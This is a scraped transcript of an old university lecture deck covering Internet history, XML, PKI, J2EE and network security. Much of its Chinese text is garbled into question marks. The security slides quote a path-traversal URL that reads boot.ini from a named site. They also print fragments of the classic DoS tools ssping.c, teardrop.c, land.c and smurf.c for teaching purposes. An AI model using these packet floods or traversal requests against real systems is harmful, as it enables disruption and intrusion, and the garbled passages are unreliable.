More Internet technologies and their applications

About This Presentation

Title:

More Internet technologies and their applications

Description:

Title: Author: snmphost Last modified by: tsaiwn Created Date: 7/2/2000 4:21:46 AM Document presentation format: – PowerPoint PPT presentation

Number of Views:1217

Avg rating:3.0/5.0

Slides: 144

Provided by: snmp

Category:

more less

Transcript and Presenter's Notes

Title: More Internet technologies and their applications

1
More Internet technologies and their
applications

(??????????)

??? tsaiwn_at_csie.nctu.edu.tw
2
Agenda

Introduction to Internet Technology
Web (WWW)
XML, XUL
PKI?????(?????????)
J2EE
Introduction to Network Security
Authentication
RSA Public Key Algorithm
X.509 Certificates and their applications

3
Internet ??????

1962 ARPA computer program begins
1965 First actual network experiment, Lincoln
Labs (now part of MIT)
1966 ARPA packet-switching experimentation
1969 First Arpanet nodes operational
1972 Distributed e-mail invented
1973 For non-U.S. computer linked to ARPAnet
1975 Arpanet transitioned to Defense
communications Agency
1977 E-mail takes off, Internet becomes a
reality, Number of hosts breaks 100.
1978/2 first real BBS, the Board in Chicago
1980 TCP/IP experimentation begins
1981 New host added every 20 days

4
Internet ??????(Cont.)

1983 TCP/IP switchover complete
1984 Number of hosts breaks 1,000.
1986 NFSnet backbone created
1987 Number of hosts breaks 30,000.
1989 Number of hosts breaks 100,000
1990 Arpanet retired
1990 300,000 Hosts. 1,000 News groups
1991 Gopher introduced, U of Minnesota.
1991 WWW invented
1992 Hosts 1 Million. News groups 4,000
1993 Mosaic introduced (?????????)
1993 Hosts 2 Million. 600 WWW sites

5
Internet ??????(Cont.2)

1995 Internet backbone privatized
1995/May Java formally announced by Sun
Microsystems (JacaScript by Netscape)
1995 6.5 Million Hosts, 100,000 WWW Sites
1996 OC-3 (155Mbps) backbone built
1996 Internet 2
1996 Next Generation Internet (NGI)
1997 20 Million Hosts,
1 Million WWW sites, 71,618 Newsgroups.
1999 Dot-com Frenzy. ?
2000 Dot-com Crash. ? ? ?
123 Million Hosts, 8.5 Million WWW sites

6
www.Yahoo.com ????
7
www.Yahoo.com ?? (by ???)

1968????????
?????????????
???????????????
???????CAD????
1994??David Filo ??Yahoo

8
TANet History, Hinet

1989/9 ????????????????????????????,??????????????
???????
1990?2? ????????????(Taiwan Academic Network,??
TANet)?1990?7? TANet ?????
1991/12 TANet ?64Kbps????????? JvNCnet ???
1994/4/1 ??????Hinet?????????, ????????????,
???????????
1994/8 ???????????????????????,?? N I I ???
(National Information Infrastructure project)
???????????????? Internet ????300???
1994/10 TANet ????????512 Kbps ?
1995/4 Hinet ???????
1995/10 ?????????T1(1.544Mbps),1996/5???2?T1
,?????????????JvNCnet?????GLOBAL-ONE?1998/11
TANet?????????T3(45Mbps) ?
1998/10 ???????????,???????ADSL???
1998/12 ?? Internet ??????300???
1999/12???????ADSL????????????

9
TANet History, Hinet (cont.)

2000?02?,????????????????120 Mbps
(ATM),?????????????45 Mbps?
2000/11 Hinet ??? ????
2000/12 ??????????626???
2001/3 ??????????674??
TANet???????246?,??????????528?,
??????1.7?,ADSL????22?,
Cable Modem????14?,ISDN????1.5?,
??????3000????????????????????????,????????
?????674??
2001?10?,?????T3 2?????STM12(310Mbps)?
2001/12 ?????????? 782 ??
2002/1/24 ???? ADSL????100?, ????????
2002/6 ??????????? 800 ??
2002/8 ???? ADSL???150??
2003/8 ???? ADSL???230?,????????

10
TANet ??????
??

TANet?????????STM1(????155Mbps)????,??????????????
??????(NCHC)????????????????????????????????????
?1?2????(155MbpsX 2)????? 3 ????????????
155Mbps ????? 4 ????(70Mbps)???????????(25Mbps)
???(60Mbps) ??
????,?????????????????380 Mbps,?????????,?380
Mbps??????? ??????? 20 Mbps (??????) ??????
280 Mbps (Proxy?DNS???) ????? 80 Mbps
(??Proxy?????)

11
The World Wide Web (WWW)

The Year1988
John Walker, founder of Autodesk, acquires
Nelsons technology and sinks 5 million into its
development.
However, he is beaten to the race in 1989 by Tim
Berners-Lee a physicist at CERN (European
Particle Physics Laboratory) who proposed a
global hypertext system that he named
WorldWideWeb.
Berners-Lee specifically invented three things
HyperText Transfer Protocol (HTTP) a standard
format for enabling all computers to look up
documents.
Universal Resource Locator (URL) a standard for
finding a document by typing in an address like
http//www.webonomics.com/book.html
HyperText Markup Language (HTML) a standard
design for word processor-like functions that
enables people to add special codes to text.
The Year1991
Berners-Lee makes his trio of programs available
on the Internet.
Leads to a rapid growth in the number of web
sites.

12
WWW ??? Tim Berners-Lee

Berners-Lee has software in his blood. Both his
parents were programmers who worked for the
British company Ferranti on one of the first
commercial computers.
He read physics at Queen's College, Oxford, where
he built his first computer with a soldering
iron, a microprocessor chip and an old television
set.
Graduating in 1976, he worked first for
Plessey and later for a firm writing
typesetting software.

13
1993 Mosaic was born

One of these programmers was Marc Andreessen, who
was working for the NCSA in Urbana-Champaign,
Illinois.
In January 1993, Andreessen released a version of
his new, handsome, point-and-click graphical
browser for the Web, designed to run on Unix
machines.
In August, Andreessen and his co-workers at the
center released free versions for Macintosh and
Windows.

14
Mosiac Communications (Netscape)

December 1993 Andreersson left NCSA and founded
Mosiac Communications, now called Netscape.
Many of the key developers from NCSA went with
him to work on a new browser.

December 1995 Microsoft ?????? Internet
Microsoft Internet Explorer (IE)
Microsoft Internet Information Services (IIS)
The Apache HTTP Server Project
15
Internet Technology
Data / Legacy Systems
VPN WEB XML
Speed / Capacity
16
Internet Technology Timeline
MDB
J2EE
J2EE
1996
1997
1998
1999
2000
2001
Microsoft
QC
MMC
LCE
VS .NET
.NET
WinDNA
17
Moore's Law vs. Gilder's Law

??????(Moores Law),???(Intel)???Gordon
Moore???,??????????(chips)???????????????????
???????(Gilders Law),???????????????????

?????? -- Murphys Law ? ?

18
Moores Law vs. Gilders Law The
Last Twenty Years
Ethernet
10000
Cray T90
Cray C90
Storage
Cray Y-MP
Cray 2
1000
Alpha
RS6000/590
802.11
Alpha
Cray X-MP
100
RS6000/540
Cray 1S
i860
10
Performance in Mflop/s
R2000
Ethernet
1
Storage in MB
Speed in Mbps
80387
0.1
6881
80287
8087
0.01
1982
1998
1986
1988
1990
1994
1996
1984
1992
Source Gordon Bell, Microsoft Research
19
The Next Twenty Years
802.11
Storage
Wired Ethernet
100000
10000
1000
100
Speed in Gbps
Performance in Gflop/s
Storage in GB
10
1
0.1
2008
2010
2014
2000
2004
2006
2012
2002
2016
20
By 2009

Almost everything will be connected to the
Internet
Appliances, automobiles, personal communicators,
screens (large and small), even your watch.
3 billion Internet-capable wireless devices
The Internet will be
Telephone, answering machine, television, radio,
movie theatre, clock, store, cell phone, pager,
post office, mailbox, library, security system,
gaming platform, musical instrument, learning
center, storage medium, and much, much more!

21
XML is ...

... an eXtensible Markup Language
... HTML ? presentation tags your-own-tags
... a meta-language for defining other languages
... a semistructured data model
... not a data model but just an exchange syntax
the ASCII of the Web
... many good (and some bad) Computer Science
ideas reinvented (but now for the masses!)
... good old constant change (not the XML spec.,
but everything else)

22
Some History (or from fat via lean

SGML (Standard Generalized Markup Language)
ISO Standard, 1986, for data storage exchange
Metalanguage for defining languages (through
DTDs)
A famous SGML language HTML!!
Separation of content and display
Used in U.S. gvt. contractors, large
manufacturing companies, technical info.
Publishers,...
SGML reference is 600 pages long
XML (eXtensible Markup Language)
W3C (World Wide Web Consortium) --
http//www.w3.org/XML/ recommendation in 1998
Simple subset (80/20 rule) of SGML ASCII of
the Web, Semantic Web
XML specification is 26 pages long

23
HTML vs. XML
HTML tags presentation, generic document
structure

lth1gt Bibliography lt/h1gt
ltpgt ltigt Foundations of DBslt/igt, Abiteboul, Hull,
Vianu
ltbrgt Addison-Wesley, 1995
ltpgt ltigt Logics for DBs and ISs lt/igt, Chomicki,
Saake, eds.
ltbrgt Kluwer, 1998
ltbibliographygt
ltbookgt lttitlegt Foundations of DBs lt/titlegt
ltauthorgt Abiteboul lt/authorgt
ltauthorgt Hull lt/authorgt
ltauthorgt Vianu
lt/authorgt
ltpublishergt Addison-Wesley lt/publishergt
....
.lt/bookgt
ltbookgt ... lteditorgt Chomicki lt/editorgt...
lt/bookgt ...
lt/bibliographygt

XML tags content, "semantic",
(DTD-) specific
24
XML vs SGML

origins HTML SGML (ISO Standard, 1986, 600pp)
W3C standard (26 pp) XML syntax DTDs
XML HTML ? presentational tags
user-defined DTD
(tagsnesting)
gt really a metalanguage for defining other
languages via DTDs
gt XML is more like SGML than HTML
XML SGML ? complexity, document perspective
simplicity, data
exchange perspective

25
XML as a Self-Describing Data Exchange Format

can be easily understood by our friend (...
even using CP/M edlin)
can be parsed easily
contains its own structure (parse tree) in the
data
gt allows the application programmer to
rediscover schema and content/semantics (to
which extent???)
may include an explicit schema description
(e.g., DTD)
gt meta-language definition of a language w.r.t.
which it is valid
allows separation of marked-up content from
presentation (gtstyle sheets)
many tools (and many more to come -- (re)use
code) parsers, validators, query languages,
storage,
standards (good for interoperation, integration,
etc)
gt generic standards (XML, DTDs, XML Schema,
XPath,...)
gt community/industry standards (specific markup
languages)

26
Different Perspectives on XML

Document (SGML) Community
data linear text documents
mark up (annotate) text pieces to describe
context, structure, semantics of the marked text
Database Community
XML as a (most prominent) example of the
semistructured data model
gt captures the whole spectrum from highly
structured, regular data to unstructured data
(relational, object-oriented, HTML, marked up
text, ...)

27
XML Applications Industry Initiatives

http//www.oasis-open.org/cover/xml.htmlapplicati
ons
Advertising adXML place an ad onto an ad network
or to a single vendor
Literature Gutenberg convert the worlds great
literature into XML
Directories dirXML Novells Directory Services
Markup Language (DSML)
Web Servers apacheXML parsers, XSL, web
publishing
Travel openTravel information for airlines,
hotels, and car rental places
News NewsML creation, transfer and delivery of
news
Human Resources XML-HR standardization of
HR/electronic recruiting XML definitions
International Dvt IDML improve the mgt. and
exchange of info. for sustainable development
Voice VoxML markup language for voice
applications
Wireless WAP (Wireless Application Protocol)
wireless devices on the World Wide Web
Weather OMF Weather Observation Markup Format
(simulation)
Geospatial ANZMETA distributed national
directory for land information
Banking MBA Mortgage Bankers Association of
America --gt credit report, loan file,
underwriting
Healthcare HL7 DTDs for prescriptions, policies
procedures, clinical trials
Math MathML (Mathematical Markup Language)
Surveys DDI (Data Documentation Initiative)
codebooks in the social and behavioral sciences

28
Elements and their Content
element
element type
ltbibliographygt ltpaper ID"object-fusion"gt
ltauthorsgt ltauthorgtY.Papakonstantinoult/author
gt ltauthorgtS. Abiteboullt/authorgt
ltauthorgtH. Garcia-Molinalt/authorgt lt/authorsgt
ltfullPaper source"fusion"/gt
lttitlegtObject Fusion in Mediator Systemslt/titlegt
ltbooktitlegtVLDB 96lt/booktitlegt
lt/papergt lt/bibliographygt
element content
empty element
character content
29
What is XUL ?

XML-based User interface Language (zool)
An XML grammar to add/modify UI widgets of the
browser
Makes UI building easier and faster
Uses W3C standards HTML, XML, CSS, DOM
XPToolkit is the finite set of interface-specific
elements created in XUL
XPFE (cross Platform Front End) is the front end
created from XPToolkit
XUL provides flexibility and ease of use
Cross-platform UI easily
Power enough to build application UI
Ready-made widgets

Programming in Facebook ?
30
XUL Widget Syntax

Widget
Window, box, menu, button, tabbox, checkbox,
Syntax Rules
XUL is case sensitive all events and attribute
must be written in lower case
All strings must be double quoted
All attributes must have a value
XUL file extension .xul

Programming in Facebook ?
31
Inside XUL package

Main components
Content
XUL files describes XML description of UI
Appearance
CSS, images, and others control presentation
Behavior
JavaScript defines event handling within widgets
Locale
All localizable strings in external DTD

32
XUL and JavaScript

XUL interface is a collection of disconnected
widgets until programmed
Using JavaScript and/or C
JavaScript included in XUL or a separate file
lthtmlscriptgt
function InitWindow( )
var checkbox document.getElementByID("remember
")
if (checkbox) checkbox.checked true
lt/htmlscriptgt
lthtmlscript language"javascript"
src"myscript.js"/gt

33
???????

????????????????????,??????????????
????????????????????????????????
IC?????????????????,???????????,??????IC?????
????????????????,??????,???????,?????????,????????
????,??????,????????????????

34
?????
35
????????????? (Government Public Key
Infrastructure,GPKI)
36
?????????

??? ???????????? ???? ???
??? ???????????????,???????
??? ???????,??? ???? ??,??????????,?????????????
????
??? ???????,?????????????,??????????,?????????????
??
?????IC????????(??????)?

37
?????????? (?)
38
http//village.gov.tw/
39
X.509 Authentication Service

Distributed set of servers that maintains a
database about users.
Each certificate contains the public key of a
user and is signed with the private key of a CA.
Is used in S/MIME, IP Security, SSL/TLS and SET.
RSA is recommended to use.

40
Certificate Authority

Trusted, 3rd party organization
CA (Certificate Authority) guarantees that the
individual granted a certificate is who he/she
claims to be
CA usually has arrangement with financial
institution to confirm identity
Critical to data security and electronic commerce

41
Raw Certificate has user name, public key,
expiration date, ...
Generate hash code of Raw Certificate
MIC
Raw Cert.
Hash
Encrypt hash code with CAs private key to form
CAs signature
Signed Cert.
Certificate Authority generates the signature
that is added to raw Certificate
Signed Certificate Recipient can verify signature
using CAs public key.
41
42
42
X.509 Formats
43
This Certificate belongs to investing.schwab.co
m trading subnet a 1199 Charles Schwab Co.,
Inc. Phoenix, Arizona, US
This Certificate was issued by
Secure Server Certification Authority
RSA Data Security, Inc.
US Serial Number
6B682F3BFD8A46730433108A321E475B Th
is Certificate is valid from Wed Nov 03, 1999 to
Thu Nov 02, 2000 Certificate Fingerprint
4B80C6C52D6314E76F50BD16393C96FD
Sample Certificate information
43
44
Public Key Infrastructure (PKI)

No absolute definition or standard
Each party has an associated key pair one public
and one private
Private keys are not divulged
Public keys are published
Infrastructure enables both encryption and
digital signatures (to thwart man in the middle)
Problem public key spoofing

45
PKI-Secured Applications
46
PKCS related documents

Public Key Cryptographic Standards, PKCS
A collection of 13 papers PKCS 1 to PKCS 15
developed by RSA Labs and representatives from
the academia and industry.
PKCS 1 RSA Algorithm
PKCS 3 Diffie-Hellman Algorithm
PKCS 5 Password-Based Cryptography Standard
PKCS 6 Extended-Certificate Syntax Standard
PKCS 7 Cryptographic Message Syntax Std
PKCS 8 Private-Key Information Syntax Standard
PKCS 9 Selected Attribute Types
PKCS 10 Key Certification Request
PKCS 11 Standard API for developers
PKCS 12 Certificate Interchange Format
PKCS 13 Elliptic Curves Algorithm
PKCS 14 PRNG Algorithms
PKCS 15 Smart Card File Format

47
http//www.pki.gov.tw/
48
?????
PKIUser
PKICA
PKI ??
http//210.71.181.21/
49
Server AP?????

?????????(Server Application Process)???
,??????????
SSL?Server AP ????????????????,??????????????????
???,????????????????????????

50
Server AP??????-Client??Server??
Server AP??
Server AP? ????
Client????CA??
????
????
????????
CA???
Server AP? DN
?????DN? ???????
CA?DN
???? DN
CA? ????
????????
??CA Public Key ??signature???
CA? ????
?ServerAP s DN ???DN?????
51
Server AP???Device?????(1/2)

????(subject??)??????????
?????????????, ??????????????
Device ???????????,?????,???, PC,
Workstation?VPN?VSU???????????????Device??,
???????????
??Server????????????Service,?????????Server???????
Service????????(Server Application
Process),????????????????????????????Server AP??,
???????????

52
Server AP???Device?????(2/2)

GCA Server AP???????????????????????????,??GCA
Server AP?????????GCA????????????????(Server
AP)?? ?
??????,??????Workstation?GCA?????(????????)?
??????????, ???GCA Server AP???????????????,?????f
loppy?,??storage media??????????,?????????Server
AP??????

53
GCA Server AP????
?????? ???? ????? ????? ?????? ???????(Subject
Name) ????? ???????? ????????(Subject Unique
ID) ???? ???? ??????(Subject Alt Name) ???? ..
CA ??
????
54
GCA Server AP?????(1/3)
Server AP ??(AP??Application Process),???????
(Proprietary)?Server AP??? SSL?Server
AP?????Time Stamp Server ?OCSP Server??????Specifi
c??? GCA???????????????SSL?Server
AP??? ????????????Common name?ou???????? ???????,?
Common name??Server AP??? ??IP Address(?1)??SSL?S
erver AP??,?Common name????Server AP????Domain
name? (?1???? ????????????????,
?????????????????????, ???????????,
????????????????????????, ?????????(profile)
???????????, ???????X. 521?????, ?cn??????????,
????????????IP Address, ????domain name??Trust
Third Party??,????IP Address???????????????????.)
55
GCA Server AP?????(2/3)

???????,?ou???????????,???
??????????????????????????
??
ou?????????????
?SSL?Server AP??,?ou???????,??????????????????????
????????????
??
ou???????????????IP??

56
GCA Server AP?????(3/3)

???????????? SSL??????????

o
CN
CN
Subject Alt Name
Subject Alt Name
ou
ou
o
57
FAQ regarding GCA

Q1.????????(?)??????Server AP?? ?
A1. ????? ?????????, ??????????????????(?)????????
????,???????, Server AP?????????????????(process)?
Q.2 RA?RAO??????
A2. RA?Registration Authority???????, ? RAO RA
Operator??????????, ??????RA????RAO?

58
Client/Server(2-Tier) Database Access

Client Tier Presentation, Business Logic

Data Tier Database Management Services

Source Sun Microsystems, Inc., JDBC 3.0
Specification
59
Traditional(non-component) N-Tier Systems

Client Tier Presentation Logic

Application Tier Business Logic

Data Tier Database Management Services

Source Sun Microsystems, Inc., JDBC 3.0
Specification
60
Component N-Tier SystemsJ2EE Architecture
EIS Tier
Web Tier
Business Tier
Client Tier
J2EE Server Machine
Client Machine
Database Server Machine
61
J2EE and Other Java 2 Platform Editions
Source Computer, August 2000
J2EE, J2SE, J2ME
62
J2EE and Other Java 2 Platform Editions
J2EE, J2SE, J2ME
Source Sun Microsystems, Inc.
63
J2EE Platform Technologies 1/3

Servlets and JSP
Java technology servlets and JavaServer Pages are
server components that run in a web server that
supports dynamic HTML generation and session
management for browser clients.
EJB
Enterprise JavaBeans is a server component model
that provides protability across application
servers and implements automatic services on
behalf of the application components.
JTA
Java Transaction API provides a transaction
demarcation API.
JTS
Java transaction Service defines a distributed
transaction management service based on the CORBA
Object Transaction Service.

64
J2EE Platform Technologies 2/3

JNDI
Java Naming and Directory Interface provides
access to naming and directory services, such as
DNS, LDAP, NDS, and CORBA Naming.
RMI-IIOP
Remote Method Invocation(RMI) creates remote
interfaces for Java-to-Java communication. This
extension uses the CORBA standard IIOP
communication protocol.
Java IDL
Java Interface Definition Language creates remote
interfaces to support java-to-CORBA
communications.

65
J2EE Platform Technologies 3/3

JDBC
JDBC database access API provides uniform access
to relational databases.
JMS
Java Messaging Service supports asynchronous
communication using either a reliable queuing or
publish/subscribe model.
JavaMail
JavaMail provides a protocol-independent
framework to build mail and messaging
applications.
JAF
JavaBeans Activation Framework provides standard
services to determine the type of an arbitrary
piece of data and activate an appropriate
JavaBeans component to manipulate the data.

66
History of J2EE Technologies

Distributed Objects
CORBA, DCOM, etc.
Three-tier scenario presentation, business
logic, and backend databases
Hard to get right without the proper
infrastructure
Server-Side Components
Focuses on encapsulating business rules into
objects in the middle tier
Component Transaction Monitors
Descendant of CORBAs Object Request Broker
provides discovery, persistence, event
notification, transactions, etc. for three-tier
or n-tier applications

67
??????

Introduction
to
Network Security

68
??????? I

?????????
?????
Remote Password Guessing
Local Password Cracking
?????????????
???????
??????(NFS)
? NFS.avi
?????,??????????(showcode.asp)

69
http//www.???gsm.com.tw/??????????/showcode.asp?
source/msadc/Samples/../../../../../../boot.ini
70
??????? II

?????????
Buffer Overflow
???????(../../../etc/passwd)
???????(?? phf)
????????(Sniffing)
???????
????(??)
???????
??????

71
??????? II buffer overflow

???????????????buffer??buffer overrun?
??
NCSA httpd buffer overflow
NCSAs httpd v1.4 ? MAX_STRING_LEN ???? 256 ???
Crack ??? client ??server?port 80,?
?GET command ????256??,
server ?????????
Netmanerger Chameleon tool suit ???
FTP server
Buffer overflow with username
username gt 150 ??

72
Buffer overflow (Cont.)

POP3d
Buffer overflow with USER username
username gt 152??
Buffer overflow with PASS passwd
password gt 104??
SMTPd
Buffer overflow with HELO hostname
hostname gt 471??
Buffer overflow with HELP topic
topic gt 514??

73
CGI PHF ???????
74
??????? III

?????????(SYN-Flood?SMTP)
?? IP ??(IP Spoofing)
?? DNS ??(DNS Spoofing)
???????(Session Hijack)
?? Client ? Server
????(Port Scanning)

75
??????? IV

????(DoS)
SYN-Flood
Smurf
TCP?UDP?ICMP
Resource Exhausting
???????(DDoS)

76
??????? V

????(Windows)???
???????????
?????????????(???????????)
Web Bomb?ICQ Bomb?Mail Bomb
?????(MSIE?ICQ?FTPD)
OOB?IGMP(????)
Bo2k(????)

77
?????? V OOB

Out-of-band
??
???????????,?????? MSG_OOB ???
send(s, str, strlen(str), MSG_OOB)
??
MSG_OOB flag ???????,??????????
??????? Windows ?delay??,??????
Ex
Winnuke
Crash95.c

78
?????? V BO

Back orifice
Windows 95/98
??? Back orifice 2000
Windows 95/98/NT
??????
???????(console) ???(GUI)??,??????????,?????????
?back orifice ????,installation
file???????,??????windows?system
???,?????????,??installation file???????

79
BO (Cont.)

???????
Server remote target machine
Client local intruders machine
Capability
Display system info HD size, memory,,etc
Display cached passwords
Reboot the system.
Freeze the remote machine
Changing anything in the Windows Registry.
Create or delete directories
Monitor network packets
etc.

80
Denial of Service (DoS) ??

????
??Internet ??????
??
???????????????????????????????????,??
? ?????????
? ????????????

81
Distributed DoS (DDoS)

????
????????,?????????DoS???????????,?????????????????
?,???????
??
TFN
TRIN00
tfn2k

82
DoS ?????? IP Spoofing

??
???????????,???????
??,????????????????
?? IP Spoofing??,??????
??????????
?? DoS?????

83
DoS ????

???? TCP/IP ???,??????????,??????
?????? TCP/IP ??,??
Ping of Death
Teardrop
?? TCP/IP ???????,??
SYN Flood
LAND
Smurf ??

84
DoS???? Ping of Death

??
?? ping??????????? IP ?
?????????? (gt65535 bytes
based on RFC-791) ?
???????????????,?????????
??????????????????????(fragments)??????????,??????
?????????,???????????? Buffer overflow???????

85
Ping of Death (Cont.)

SSPING/Jolt
?????????? Windows 95 ? Windows NT?????
?????????? 64k ? spoofed fragmented ICMP
???????,?? Windows 95/NT ???????
ssping.c
usage ssping ltdstaddrgt ltsaddrgt ltnumgt

86
ssping.c

if ((hp gethostbyname(argv1)) NULL)
if ((ip-gtip_dst.s_addr inet_addr(argv1))
-1)
fprintf(stderr, "s unknown host\n",
argv1)
exit(1)
else
bcopy(hp-gth_addr_list0, ip-gtip_dst.s_addr,
hp-gth_length)
if ((hp2 gethostbyname(argv2)) NULL)
if ((ip-gtip_src.s_addr inet_addr(argv2))
-1)
fprintf(stderr, "s unknown host\n",
argv2)
exit(1)
else
bcopy(hp2-gth_addr_list0, ip-gtip_src.s_addr,
hp-gth_length)

87
ssping.c (C.1)

printf("Sending to s\n", inet_ntoa(ip-gtip_dst))
ip-gtip_v 4
ip-gtip_hl sizeof ip gtgt 2
ip-gtip_tos 0
ip-gtip_len htons(sizeof buf)
ip-gtip_id htons(4321)
ip-gtip_off htons(0)
ip-gtip_ttl 255
ip-gtip_p 1
ip-gtip_csum 0 / kernel fills
in /
dst.sin_addr ip-gtip_dst
dst.sin_family AF_INET
icmp-gttype ICMP_ECHO
icmp-gtcode 0
icmp-gtchecksum htons((ICMP_ECHO ltlt 8))

88
ssping.c (C.2)

for (offset 0 offset lt 65536 offset
(sizeof buf - sizeof ip))
ip-gtip_off htons(offset gtgt 3)
if (offset lt 65120)
ip-gtip_off htons(0x2000)
else
ip-gtip_len htons(418) / make total 65538
/
if (sendto(s, buf, sizeof buf, 0, (struct
sockaddr )dst, sizeof dst) lt 0)
fprintf(stderr, "offset d ",
offset) perror("sendto")
if (offset 0)
icmp-gttype 0
icmp-gtcode 0
icmp-gtchecksum 0

89
DoS???? -- Teardrop

????
??IP???????
??????????????,???????????????????,?????????????
??
???(Network layer)?IP(Internet
Protocol)???????????? (fragmentation)???(re-assemb
ly)?
?????? ??????

90
Teardrop (Cont.)

??????????,??????????????????,???? datagrams
incomplete.
?????????????????????????,????????
Windows NT
? NT ?????invalid datagrams?,????
kernel memory,??????invalid datagrams??,
???NT???
Example teardrop.c

91
teardrop.c (1/5)
?? IP ?????????

void send_frags(int, u_long, u_long, u_short,
u_short)
int main(int argc, char argv)
.
.
for (i 0 i lt count i)
send_frags(rip_sock, src_ip, dst_ip, src_prt,
dst_prt) fprintf(stderr, "b00m ")
usleep(500)
.
.

92
teardrop.c (2/5)

void send_frags(int sock, u_long src_ip, u_long
dst_ip, u_short src_prt,
u_short dst_prt)
u_char packet NULL, p_ptr NULL /
packet pointers /
u_char byte
/ a byte /
struct sockaddr_in sin /
socket protocol structure / sin.sin_family
AF_INET
sin.sin_port src_prt
sin.sin_addr.s_addr dst_ip
/
Grab some memory for our packet, align p_ptr
to point at the beginning
of our packet, and then fill it with zeros.
/
packet (u_char ) malloc(IPH UDPH
PADDING)
p_ptr packet
bzero( (u_char )p_ptr, IPH UDPH PADDING)

93
teardrop.c (3/5)

byte 0x45 / IP
version and header length / memcpy(p_ptr,
byte, sizeof(u_char))
p_ptr 2 / IP TOS
(skipped) /
((u_short )p_ptr) FIX(IPH UDPH PADDING)
/ total length / p_ptr 2
((u_short )p_ptr) htons(242) / IP id /
p_ptr 2
((u_short )p_ptr) FIX(IP_MF) / IP frag
flags and offset /
p_ptr 2
((u_short )p_ptr) 0x40 / IP TTL /
byte IPPROTO_UDP
memcpy(p_ptr 1, byte, sizeof(u_char))
p_ptr 4 / IP
checksum filled in by kernel /
((u_long )p_ptr) src_ip / IP
source address /
p_ptr 4
((u_long )p_ptr) dst_ip / IP
destination address /

94
teardrop.c (4/5)

p_ptr 4
((u_short )p_ptr) htons(src_prt) /
UDP source port /
p_ptr 2
((u_short )p_ptr) htons(dst_prt) /
UDP destination port /
p_ptr 2
((u_short )p_ptr) htons(8 PADDING) /
UDP total length /
/ sending first packet /
if (sendto(sock, packet, IPH UDPH PADDING,
0, (struct sockaddr)sin,
sizeof(struct sockaddr)) -1)
perror("\nsendto")
free(packet)
exit(1)

95
teardrop.c (5/5)

/ We set the fragment offset to be inside of
the previous packet's
payload (it overlaps inside the previous
packet) but do not include
enough payload to cover complete the
datagram. Just the header will
do, but to crash NT/95 machines, a bit
larger of packet seems to work
better.
/
p_ptr packet2 / IP total length
is 2 bytes into the header /
((u_short )p_ptr) FIX(IPH MAGIC
1)
p_ptr 4 / IP offset is 6
bytes into the header /
((u_short )p_ptr) FIX(MAGIC)
if (sendto(sock, packet, IPH MAGIC 1, 0,
(struct sockaddr )sin,
sizeof(struct sockaddr)) -1)
perror("\nsendto")
free(packet)
exit(1)
free(packet)

96
Dos ???? SYN flood

??
???(transport layer)? TCP????????? three way
handshake
SYN
A SYN-ACK B
ACK
????
???????????????????SYN??

97
SYN flood (C.1)

????????????ACK???SYN????????,??????ACK???????????
???
??????????ACK??,????????????SYN?????????????????
Windows NT 3.5x/4.0
????????ACK???,?????SYN-ACK???????????ACK??????
????????3?,?????6?12?24?48?,???96???????SYN???
????????SYN?????????????,??189?,????????

98
SYN flood (C.2)

Ex synk4.c
http//www.google.com

99
DoS???? Land attack

??
???? three way handshake ???,???????
(????,????,????,????)
?????????????
????????????,???????????????
????????????,?????????????? ???

100
Land Attack (Cont.)

????
??????????,?????????????????????,???????????????
Ex land.c

101
land.c

int main(int argc, char argv)
.
.
.
tcpheader-gtth_sportsin.sin_port / lt
the same port /
tcpheader-gtth_dportsin.sin_port
tcpheader-gtth_seqhtonl(0xF1C)
tcpheader-gtth_flagsTH_SYN
tcpheader-gtth_offsizeof(struct tcphdr)/4
tcpheader-gtth_winhtons(2048)

102
Land.c (Cont.)

bzero(pseudoheader,12sizeof(struct tcphdr))
/ the same address /
pseudoheader.saddr.s_addrsin.sin_addr.s_addr
pseudoheader.daddr.s_addrsin.sin_addr.s_addr
pseudoheader.protocol6
pseudoheader.lengthhtons(sizeof(struct
tcphdr))
bcopy((char ) tcpheader,(char )
pseudoheader.tcpheader,sizeof(struct tcphdr))
tcpheader-gtth_sumchecksum((u_short )
pseudoheader,12sizeof(struct tcphdr))
.
.

103
Smurf

??
ICMP(Internet Control Message Protocol)???????????
??????,????????????????
????
???????? ICMP echo request packet
???????,???ICMP echo reply packet
????????? ping?????
??,??????IP protocol????Ping message???Internet???
???,????Reply message ??????????

104
Smurf (Cont.)

????
???????ICMP echo request ???
????????????,????????ICMP echo reply????????????
?smurf attack ?,?????????????ICMP echo request
packet ?IP broadcast address ??? DoS
attack,??????
The attacker
The intermediary
The victim
Ex smurf.c

105
smurf.c

for (i 0 i lt num !num i)
if (!(i 25))
printf(".") fflush(stdout)
smurf(sock, sin,
inet_addr(bcastaddrcycle),
pktsize)
cycle
if (bcastaddrcycle 0x0)
cycle 0
usleep(delay)

106
smurf.c (Cont.)

void smurf(int sock, struct sockaddr_in sin,
u_long dest, int psize)
struct ip ip
struct icmp icmp char packet
int hincl 1
packet malloc(sizeof(struct ip)
sizeof(struct icmp) psize)
ip (struct ip ) packet
icmp (struct icmp ) (packet sizeof(struct
ip))
memset(packet, 0, sizeof(struct ip)
sizeof(struct icmp) psize)
setsockopt(sock, IPPROTO_IP, IP_HDRINCL, hincl,
sizeof(hincl))
/ . . . /
ip-gtip_src.s_addr sin.sin_addr.s_addr
ip-gtip_dst.s_addr dest
icmp-gticmp_type 8
icmp-gticmp_code 0
icmp-gticmp_cksum htons((ICMP_ECHO ltlt 8))
sendto(sock, packet,
sizeof(struct ip) sizeof(struct
icmp) psize,
0, (struct sockaddr ) sin,
sizeof(struct sockaddr))

107
DDoS ???? -- TFN

TFN ??????? smurf ?????
???? Distributed DoS????,TFN?? client ???
daemon???
?????????
ICMP flood
SYN flood
UDP flood
Smurf attack

108
TFN (Cont.)

?????TFN?????????client
???client????? daemon??????
????????ICMP echo reply??,
??????????????ICMP??????,?? client?daemon?????????
????????????

109
DoS ????

???????DNS searching, www server searching,
host/port scanning????,???hidden daemon (Trojan
horse),???????,??daemon,????????,???????????
?????????,???????????? client?daemon
Router???????
DNS??
??server?ACL
?? Firewall/security gateway

110
????---??????

SUID attack
Password attack
Trusted-Access attack
Sequence Number Prediction Attack
Session Hijacking Attack
Trojan Horse Attack

111
?????????

??????
????????????
?????????
?????????
????

112
??? Backdoor

Setuid shell
/bin/login?/bin/inetd
/etc/inetd.conf?/etc/services
Crontab,netstat,tcpd,fingerd,sendmail,ftpd,...
Windows ?
Config.sys, Autoexec.bat
Win.ini, system.ini, registry

113
??????

Spiders
??????,????????????????
Port Scanner
nmap / strobe
??????????????
nmap ?????????,???????????
Security Scanner
